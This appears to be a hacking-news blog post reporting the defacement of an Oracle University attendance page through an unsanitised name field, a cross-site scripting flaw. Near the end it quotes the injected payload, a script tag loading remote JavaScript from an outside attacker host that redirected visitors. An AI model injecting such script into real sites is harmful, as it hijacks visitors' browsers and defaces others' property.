Oracle Subdomain Page Defaced by Indian Hacker

Share it:
A group of Indian hacker named as I-Hos (Indian Hackers Online Squad) have just minutes ago defaced the page of the sub domain of Oracle Corporation. Oracle is one of the biggest software and programming company.

At the deface page showing the logo of the hackers group with a message "Just a security test", followed with a quotation for all the Indian hackers shows, “LOVE TO ALL INDIAN HACKERS OUT THERE.”

On this hack neither website was compromised nor server was hacked. Actually hackers have found a page on the Oracle website that allows him to inject HTML/JavaScript code into the Oracle University Electronic Attendance webpage in order to modify the content. The page of Oracle University, allows any one to edit the the Student name on the website and can insert any code, which is not sanitized properly by the Oracle website- says by hacker Bl@Ck Dr@GoN.

This is like a Cross Site Scripting Vulnerability where Oracle website failed to sanitized the query properly. This makes the attacker to inject the redirect JavaScript make the users to redirect to the deface page. You can check the deface page and find the mirror of the hack on Zone-H.
Injected JavaScript :- <script src=http://oppwnjms.loomhost.com/bd1.js></script>
Share it:

Defaced

Post A Comment:

0 comments:

Follow by Email